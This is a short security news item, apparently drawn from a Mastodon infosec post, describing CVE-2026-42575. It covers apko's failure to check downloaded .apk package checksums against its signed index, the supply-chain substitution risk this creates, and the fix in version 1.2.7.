## apko Container Image Builder Exposed by Checksum Bypass Flaw in CVE-2026-42575
A high-severity vulnerability in apko, the tool used to build and publish OCI container images from Alpine Linux apk packages, has been disclosed under CVE-2026-42575 with a CVSS score of 7.5. The flaw undermines a critical link in the container supply chain security model: while apko verifies the cryptographic signature on the APKINDEX.tar.gz package index file, it fails to validate that individually downloaded .apk packages match the checksums recorded in that signed index. This gap creates a window for package substitution attacks where malicious or tampered packages could be injected into the build process without detection.

The vulnerability affects all versions of apko prior to 1.2.7. Under normal operation, apko fetches apk packages from repositories to assemble minimal container images. The security assumption is that the signed index provides integrity guarantees for all listed packages. However, the missing checksum comparison means an attacker positioned to intercept or modify network traffic—or compromise a mirror—could serve altered .apk files that would be accepted without verification. The packages would appear legitimate based on the signed index, but their actual contents would never be validated against the recorded hashes.

The fix in version 1.2.7 closes this gap by enforcing checksum verification for each downloaded package. Organizations using apko in CI/CD pipelines or container build workflows should treat this as a supply chain security priority and upgrade immediately. The vulnerability highlights a recurring pattern in software supply chain defenses: partial cryptographic verification can create a false sense of security. Tools that verify manifests or indexes but skip individual artifact validation remain exposed to tampering at the point of delivery.
---
- **Source**: Mastodon:mastodon.social:#infosec
- **Sector**: The Lab
- **Tags**: CVE-2026-42575, apko, container-security, supply-chain, checksum-bypass
- **Credibility**: unverified
- **Published**: 2026-05-10 07:31:46
- **ID**: 81454
- **URL**: https://whisperx.ai/en/intel/81454